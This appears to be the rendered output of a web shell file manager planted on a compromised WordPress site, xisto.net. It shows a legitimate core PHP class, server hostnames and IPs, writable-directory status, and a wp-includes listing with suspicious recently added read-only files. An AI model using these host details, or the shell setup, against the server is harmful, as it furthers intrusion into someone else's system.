✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ cp240.webserver.pt ​🇻​♯➤ 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 62.193.192.154 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.58
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/albatroz/xisto.net/wp-includes//class-wp-theme-json-resolver.php
<?php
/**
 * WP_Theme_JSON_Resolver class
 *
 * @package WordPress
 * @subpackage Theme
 * @since 5.8.0
 */

/**
 * Class that abstracts the processing of the different data sources
 * for site-level config and offers an API to work with them.
 *
 * This class is for internal core usage and is not supposed to be used by extenders (plugins and/or themes).
 * This is a low-level API that may need to do breaking changes. Please,
 * use get_global_settings, get_global_styles, and get_global_stylesheet instead.
 *
 * @access private
 */
class WP_Theme_JSON_Resolver {

	/**
	 * Container for data coming from core.
	 *
	 * @since 5.8.0
	 * @var WP_Theme_JSON
	 */
	private static $core = null;

	/**
	 * Container for data coming from the theme.
	 *
	 * @since 5.8.0
	 * @var WP_Theme_JSON
	 */
	private static $theme = null;

	/**
	 * Whether or not the theme supports theme.json.
	 *
	 * @since 5.8.0
	 * @var bool
	 */
	private static $theme_has_support = null;

	/**
	 * Container for data coming from the user.
	 *
	 * @since 5.9.0
	 * @var WP_Theme_JSON
	 */
	private static $user = null;

	/**
	 * Stores the ID of the custom post type
	 * that holds the user data.
	 *
	 * @since 5.9.0
	 * @var int
	 */
	private static $user_custom_post_type_id = null;

	/**
	 * Container to keep loaded i18n schema for `theme.json`.
	 *
	 * @since 5.8.0 As `$theme_json_i18n`.
	 * @since 5.9.0 Renamed from `$theme_json_i18n` to `$i18n_schema`.
	 * @var array
	 */
	private static $i18n_schema = null;

	/**
	 * Processes a file that adheres to the theme.json schema
	 * and returns an array with its contents, or a void array if none found.
	 *
	 * @since 5.8.0
	 *
	 * @param string $file_path Path to file. Empty if no file.
	 * @return array Contents that adhere to the theme.json schema.
	 */
	private static function read_json_file( $file_path ) {
		$config = array();
		if ( $file_path ) {
			$decoded_file = wp_json_file_decode( $file_path, array( 'associative' => true ) );
			if ( is_array( $decoded_file ) ) {
				$config = $decoded_file;
			}
		}
		return $config;
	}

	/**
	 * Returns a data structure used in theme.json translation.
	 *
	 * @since 5.8.0
	 * @deprecated 5.9.0
	 *
	 * @return array An array of theme.json fields that are translatable and the keys that are translatable.
	 */
	public static function get_fields_to_translate() {
		_deprecated_function( __METHOD__, '5.9.0' );
		return array();
	}

	/**
	 * Given a theme.json structure modifies it in place to update certain values
	 * by its translated strings according to the language set by the user.
	 *
	 * @since 5.8.0
	 *
	 * @param array  $theme_json The theme.json to translate.
	 * @param string $domain     Optional. Text domain. Unique identifier for retrieving translated strings.
	 *                           Default 'default'.
	 * @return array Returns the modified $theme_json_structure.
	 */
	private static function translate( $theme_json, $domain = 'default' ) {
		if ( null === self::$i18n_schema ) {
			$i18n_schema       = wp_json_file_decode( __DIR__ . '/theme-i18n.json' );
			self::$i18n_schema = null === $i18n_schema ? array() : $i18n_schema;
		}

		return translate_settings_using_i18n_schema( self::$i18n_schema, $theme_json, $domain );
	}

	/**
	 * Return core's origin config.
	 *
	 * @since 5.8.0
	 *
	 * @return WP_Theme_JSON Entity that holds core data.
	 */
	public static function get_core_data() {
		if ( null !== self::$core ) {
			return self::$core;
		}

		$config     = self::read_json_file( __DIR__ . '/theme.json' );
		$config     = self::translate( $config );
		self::$core = new WP_Theme_JSON( $config, 'default' );

		return self::$core;
	}

	/**
	 * Returns the theme's data.
	 *
	 * Data from theme.json will be backfilled from existing
	 * theme supports, if any. Note that if the same data
	 * is present in theme.json and in theme supports,
	 * the theme.json takes precendence.
	 *
	 * @since 5.8.0
	 * @since 5.9.0 Theme supports have been inlined and the `$theme_support_data` argument removed.
	 *
	 * @param array $deprecated Deprecated. Not used.
	 * @return WP_Theme_JSON Entity that holds theme data.
	 */
	public static function get_theme_data( $deprecated = array() ) {
		if ( ! empty( $deprecated ) ) {
			_deprecated_argument( __METHOD__, '5.9.0' );
		}
		if ( null === self::$theme ) {
			$theme_json_data = self::read_json_file( self::get_file_path_from_theme( 'theme.json' ) );
			$theme_json_data = self::translate( $theme_json_data, wp_get_theme()->get( 'TextDomain' ) );
			self::$theme     = new WP_Theme_JSON( $theme_json_data );

			if ( wp_get_theme()->parent() ) {
				// Get parent theme.json.
				$parent_theme_json_data = self::read_json_file( self::get_file_path_from_theme( 'theme.json', true ) );
				$parent_theme_json_data = self::translate( $parent_theme_json_data, wp_get_theme()->parent()->get( 'TextDomain' ) );
				$parent_theme           = new WP_Theme_JSON( $parent_theme_json_data );

				// Merge the child theme.json into the parent theme.json.
				// The child theme takes precedence over the parent.
				$parent_theme->merge( self::$theme );
				self::$theme = $parent_theme;
			}
		}

		/*
		 * We want the presets and settings declared in theme.json
		 * to override the ones declared via theme supports.
		 * So we take theme supports, transform it to theme.json shape
		 * and merge the self::$theme upon that.
		 */
		$theme_support_data = WP_Theme_JSON::get_from_editor_settings( get_default_block_editor_settings() );
		if ( ! self::theme_has_support() ) {
			if ( ! isset( $theme_support_data['settings']['color'] ) ) {
				$theme_support_data['settings']['color'] = array();
			}

			$default_palette = false;
			if ( current_theme_supports( 'default-color-palette' ) ) {
				$default_palette = true;
			}
			if ( ! isset( $theme_support_data['settings']['color']['palette'] ) ) {
				// If the theme does not have any palette, we still want to show the core one.
				$default_palette = true;
			}
			$theme_support_data['settings']['color']['defaultPalette'] = $default_palette;

			$default_gradients = false;
			if ( current_theme_supports( 'default-gradient-presets' ) ) {
				$default_gradients = true;
			}
			if ( ! isset( $theme_support_data['settings']['color']['gradients'] ) ) {
				// If the theme does not have any gradients, we still want to show the core ones.
				$default_gradients = true;
			}
			$theme_support_data['settings']['color']['defaultGradients'] = $default_gradients;
		}
		$with_theme_supports = new WP_Theme_JSON( $theme_support_data );
		$with_theme_supports->merge( self::$theme );

		return $with_theme_supports;
	}

	/**
	 * Returns the custom post type that contains the user's origin config
	 * for the current theme or a void array if none are found.
	 *
	 * This can also create and return a new draft custom post type.
	 *
	 * @since 5.9.0
	 *
	 * @param WP_Theme $theme              The theme object. If empty, it
	 *                                     defaults to the current theme.
	 * @param bool     $create_post        Optional. Whether a new custom post
	 *                                     type should be created if none are
	 *                                     found. Default false.
	 * @param array    $post_status_filter Optional. Filter custom post type by
	 *                                     post status. Default `array( 'publish' )`,
	 *                                     so it only fetches published posts.
	 * @return array Custom Post Type for the user's origin config.
	 */
	public static function get_user_data_from_wp_global_styles( $theme, $create_post = false, $post_status_filter = array( 'publish' ) ) {
		if ( ! $theme instanceof WP_Theme ) {
			$theme = wp_get_theme();
		}
		$user_cpt         = array();
		$post_type_filter = 'wp_global_styles';
		$args             = array(
			'numberposts' => 1,
			'orderby'     => 'date',
			'order'       => 'desc',
			'post_type'   => $post_type_filter,
			'post_status' => $post_status_filter,
			'tax_query'   => array(
				array(
					'taxonomy' => 'wp_theme',
					'field'    => 'name',
					'terms'    => $theme->get_stylesheet(),
				),
			),
		);

		$cache_key = sprintf( 'wp_global_styles_%s', md5( serialize( $args ) ) );
		$post_id   = wp_cache_get( $cache_key );

		if ( (int) $post_id > 0 ) {
			return get_post( $post_id, ARRAY_A );
		}

		// Special case: '-1' is a results not found.
		if ( -1 === $post_id && ! $create_post ) {
			return $user_cpt;
		}

		$recent_posts = wp_get_recent_posts( $args );
		if ( is_array( $recent_posts ) && ( count( $recent_posts ) === 1 ) ) {
			$user_cpt = $recent_posts[0];
		} elseif ( $create_post ) {
			$cpt_post_id = wp_insert_post(
				array(
					'post_content' => '{"version": ' . WP_Theme_JSON::LATEST_SCHEMA . ', "isGlobalStylesUserThemeJSON": true }',
					'post_status'  => 'publish',
					'post_title'   => 'Custom Styles',
					'post_type'    => $post_type_filter,
					'post_name'    => 'wp-global-styles-' . urlencode( wp_get_theme()->get_stylesheet() ),
					'tax_input'    => array(
						'wp_theme' => array( wp_get_theme()->get_stylesheet() ),
					),
				),
				true
			);
			$user_cpt    = get_post( $cpt_post_id, ARRAY_A );
		}
		$cache_expiration = $user_cpt ? DAY_IN_SECONDS : HOUR_IN_SECONDS;
		wp_cache_set( $cache_key, $user_cpt ? $user_cpt['ID'] : -1, '', $cache_expiration );

		return $user_cpt;
	}

	/**
	 * Returns the user's origin config.
	 *
	 * @since 5.9.0
	 *
	 * @return WP_Theme_JSON Entity that holds styles for user data.
	 */
	public static function get_user_data() {
		if ( null !== self::$user ) {
			return self::$user;
		}

		$config   = array();
		$user_cpt = self::get_user_data_from_wp_global_styles( wp_get_theme() );

		if ( array_key_exists( 'post_content', $user_cpt ) ) {
			$decoded_data = json_decode( $user_cpt['post_content'], true );

			$json_decoding_error = json_last_error();
			if ( JSON_ERROR_NONE !== $json_decoding_error ) {
				trigger_error( 'Error when decoding a theme.json schema for user data. ' . json_last_error_msg() );
				return new WP_Theme_JSON( $config, 'custom' );
			}

			// Very important to verify that the flag isGlobalStylesUserThemeJSON is true.
			// If it's not true then the content was not escaped and is not safe.
			if (
				is_array( $decoded_data ) &&
				isset( $decoded_data['isGlobalStylesUserThemeJSON'] ) &&
				$decoded_data['isGlobalStylesUserThemeJSON']
			) {
				unset( $decoded_data['isGlobalStylesUserThemeJSON'] );
				$config = $decoded_data;
			}
		}
		self::$user = new WP_Theme_JSON( $config, 'custom' );

		return self::$user;
	}

	/**
	 * Returns the data merged from multiple origins.
	 *
	 * There are three sources of data (origins) for a site:
	 * default, theme, and custom. The custom's has higher priority
	 * than the theme's, and the theme's higher than default's.
	 *
	 * Unlike the getters {@link get_core_data},
	 * {@link get_theme_data}, and {@link get_user_data},
	 * this method returns data after it has been merged
	 * with the previous origins. This means that if the same piece of data
	 * is declared in different origins (user, theme, and core),
	 * the last origin overrides the previous.
	 *
	 * For example, if the user has set a background color
	 * for the paragraph block, and the theme has done it as well,
	 * the user preference wins.
	 *
	 * @since 5.8.0
	 * @since 5.9.0 Added user data, removed the `$settings` parameter,
	 *              added the `$origin` parameter.
	 *
	 * @param string $origin Optional. To what level should we merge data.
	 *                       Valid values are 'theme' or 'custom'. Default 'custom'.
	 * @return WP_Theme_JSON
	 */
	public static function get_merged_data( $origin = 'custom' ) {
		if ( is_array( $origin ) ) {
			_deprecated_argument( __FUNCTION__, '5.9.0' );
		}

		$result = new WP_Theme_JSON();
		$result->merge( self::get_core_data() );
		$result->merge( self::get_theme_data() );

		if ( 'custom' === $origin ) {
			$result->merge( self::get_user_data() );
		}

		return $result;
	}

	/**
	 * Returns the ID of the custom post type
	 * that stores user data.
	 *
	 * @since 5.9.0
	 *
	 * @return integer|null
	 */
	public static function get_user_global_styles_post_id() {
		if ( null !== self::$user_custom_post_type_id ) {
			return self::$user_custom_post_type_id;
		}

		$user_cpt = self::get_user_data_from_wp_global_styles( wp_get_theme(), true );

		if ( array_key_exists( 'ID', $user_cpt ) ) {
			self::$user_custom_post_type_id = $user_cpt['ID'];
		}

		return self::$user_custom_post_type_id;
	}

	/**
	 * Whether the current theme has a theme.json file.
	 *
	 * @since 5.8.0
	 * @since 5.9.0 Added a check in the parent theme.
	 *
	 * @return bool
	 */
	public static function theme_has_support() {
		if ( ! isset( self::$theme_has_support ) ) {
			self::$theme_has_support = (
				is_readable( self::get_file_path_from_theme( 'theme.json' ) ) ||
				is_readable( self::get_file_path_from_theme( 'theme.json', true ) )
			);
		}

		return self::$theme_has_support;
	}

	/**
	 * Builds the path to the given file and checks that it is readable.
	 *
	 * If it isn't, returns an empty string, otherwise returns the whole file path.
	 *
	 * @since 5.8.0
	 * @since 5.9.0 Adapted to work with child themes, added the `$template` argument.
	 *
	 * @param string $file_name Name of the file.
	 * @param bool   $template  Optional. Use template theme directory. Default false.
	 * @return string The whole file path or empty if the file doesn't exist.
	 */
	private static function get_file_path_from_theme( $file_name, $template = false ) {
		$path      = $template ? get_template_directory() : get_stylesheet_directory();
		$candidate = $path . '/' . $file_name;

		return is_readable( $candidate ) ? $candidate : '';
	}

	/**
	 * Cleans the cached data so it can be recalculated.
	 *
	 * @since 5.8.0
	 * @since 5.9.0 Added the `$user`, `$user_custom_post_type_id`,
	 *              and `$i18n_schema` variables to reset.
	 */
	public static function clean_cached_data() {
		self::$core                     = null;
		self::$theme                    = null;
		self::$user                     = null;
		self::$user_custom_post_type_id = null;
		self::$theme_has_support        = null;
		self::$i18n_schema              = null;
	}

}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
11 Jun 2026 5.16 AM
albatroz / nobody
0755
ID3
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
IXR
--
15 Jul 2024 9.45 PM
albatroz / albatroz
0755
PHPMailer
--
11 Jun 2026 10.59 PM
albatroz / albatroz
0755
Requests
--
11 Jun 2026 3.27 AM
albatroz / albatroz
0755
SimplePie
--
15 Jul 2024 9.43 PM
albatroz / albatroz
0755
Text
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
assets
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
block-patterns
--
15 Jul 2024 9.46 PM
albatroz / albatroz
0755
block-supports
--
31 Jul 2024 4.28 PM
albatroz / albatroz
0755
blocks
--
13 Feb 2022 1.18 PM
albatroz / albatroz
0755
certificates
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
css
--
11 Jun 2026 3.29 AM
albatroz / albatroz
0755
customize
--
15 Jul 2024 9.46 PM
albatroz / albatroz
0755
fonts
--
11 Jun 2026 3.29 AM
albatroz / albatroz
0755
images
--
11 Jun 2026 3.29 AM
albatroz / albatroz
0755
interactivity-api
--
11 Jun 2026 10.59 PM
albatroz / albatroz
0755
js
--
11 Jun 2026 3.29 AM
albatroz / albatroz
0755
php-compat
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
pictures
--
11 Jun 2026 12.19 AM
albatroz / albatroz
0755
pomo
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
random_compat
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
rest-api
--
15 Jul 2024 9.45 PM
albatroz / albatroz
0755
sitemaps
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
sodium_compat
--
10 Feb 2022 1.56 PM
albatroz / albatroz
0755
theme-compat
--
11 Jun 2026 3.29 AM
albatroz / albatroz
0755
widgets
--
13 Feb 2022 1.18 PM
albatroz / albatroz
0755
admin-bar.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
atomlib.php
11.668 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
author-template.php
16.631 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
block-editor.php
17.727 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
block-i18n.json
0.309 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
block-patterns.php
4.191 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
block-template-utils.php
29.572 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
block-template.php
10.442 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
blocks.php
42.187 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
bookmark-template.php
12.598 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
bookmark.php
14.973 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
cache-compat.php
1.021 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
cache-reset.php
0.012 KB
27 Jan 2025 3.29 AM
albatroz / albatroz
0644
cache.php
9.29 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
canonical.php
32.31 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
capabilities.php
34.884 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
category-template.php
54.396 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
category.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
cjfuns.php
0 KB
11 Jun 2026 7.46 AM
albatroz / albatroz
0444
class-IXR.php
2.483 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-feed.php
0.517 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-http.php
0.364 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-json.php
42.423 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-oembed.php
0.397 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-phpass.php
6.542 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-phpmailer.php
0.648 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-pop3.php
20.349 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-requests.php
29.718 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-simplepie.php
95.781 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-smtp.php
0.446 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-snoopy.php
36.831 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-walker-category-dropdown.php
2.412 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-walker-category.php
8.27 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-walker-comment.php
13.878 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-walker-nav-menu.php
9.13 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-walker-page-dropdown.php
2.646 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-walker-page.php
7.421 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-admin-bar.php
17.052 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-ajax-response.php
5.117 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-application-passwords.php
11.948 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-editor-context.php
0.869 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-list.php
4.612 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-parser.php
14.861 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-pattern-categories-registry.php
4.431 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-patterns-registry.php
5.796 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-styles-registry.php
4.882 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-supports.php
5.172 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-template.php
1.773 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-type-registry.php
4.533 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block-type.php
9.27 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-block.php
7.991 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-comment-query.php
46.334 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-comment.php
9.103 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-control.php
25.108 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-manager.php
196.558 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-nav-menus.php
55.448 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-panel.php
10.192 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-section.php
10.716 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-setting.php
29.082 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-customize-widgets.php
69.517 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-date-query.php
34.173 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-dependency.php
2.452 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-editor.php
69.537 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-embed.php
15.567 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-error.php
7.131 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-fatal-error-handler.php
7.397 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-feed-cache-transient.php
2.5 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-feed-cache.php
0.947 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-hook.php
15.323 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-cookie.php
7.213 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-curl.php
12.099 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-encoding.php
6.507 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-ixr-client.php
3.394 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-proxy.php
5.82 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-requests-hooks.php
1.938 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-requests-response.php
4.241 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-response.php
2.882 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http-streams.php
16.259 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-http.php
38.974 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-image-editor-gd.php
15.295 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-image-editor-imagick.php
26.329 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-image-editor.php
16.262 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-list-util.php
6.825 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-locale-switcher.php
4.904 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-locale.php
13.654 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-matchesmapregex.php
1.758 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-meta-query.php
29.471 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-metadata-lazyloader.php
5.227 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-network-query.php
18.722 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-network.php
12.089 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-object-cache.php
13.233 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-oembed-controller.php
6.667 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-oembed.php
29.982 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-paused-extensions-storage.php
4.808 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-post-type.php
20.72 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-post.php
6.272 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-query.php
135.702 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-recovery-mode-cookie-service.php
6.308 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-recovery-mode-email-service.php
10.41 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-recovery-mode-key-service.php
4.17 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-recovery-mode-link-service.php
3.321 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-recovery-mode.php
11.111 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-rewrite.php
61.486 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-role.php
2.439 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-roles.php
8.236 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-session-tokens.php
7.251 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-simplepie-file.php
3.183 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-simplepie-sanitize-kses.php
1.733 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-site-query.php
29.648 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-site.php
7.254 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-tax-query.php
18.993 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-taxonomy.php
13.409 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-term-query.php
37.178 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-term.php
5.148 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-text-diff-renderer-inline.php
0.699 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-text-diff-renderer-table.php
16.401 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-theme-json-resolver.php
13.951 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-theme-json-schema.php
4.195 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-theme-json.php
59.973 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-theme.php
52.563 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-user-meta-session-tokens.php
2.92 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-user-query.php
37.177 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-user-request.php
2.145 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-user.php
21.702 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-walker.php
12.707 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-widget-factory.php
3.243 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-widget.php
17.723 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp-xmlrpc-server.php
207.944 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class-wp.php
24.67 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class.wp-dependencies.php
13.68 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class.wp-scripts.php
18.5 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
class.wp-styles.php
10.626 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
comment-template.php
93.813 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
comment.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
compat.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
cron.php
39.899 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
date-time.php
0.012 KB
27 Jan 2025 3.29 AM
albatroz / albatroz
0644
date.php
0.396 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
dd.php
0 KB
11 Jun 2026 6.21 AM
albatroz / albatroz
0444
default-constants.php
10.017 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
default-filters.php
30.483 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
default-widgets.php
2.17 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
deprecated.php
121.394 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
embed-template.php
0.333 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
embed.php
36.05 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
error-protection.php
4.021 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
error_log
365.293 KB
10 Jun 2026 4.50 PM
albatroz / albatroz
0644
feed-atom-comments.php
5.316 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
feed-atom.php
2.977 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
feed-rdf.php
2.605 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
feed-rss.php
1.161 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
feed-rss2-comments.php
3.975 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
feed-rss2.php
3.71 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
feed.php
0 KB
10 Feb 2022 1.56 PM
albatroz / albatroz
0644
formatting.php
0 KB
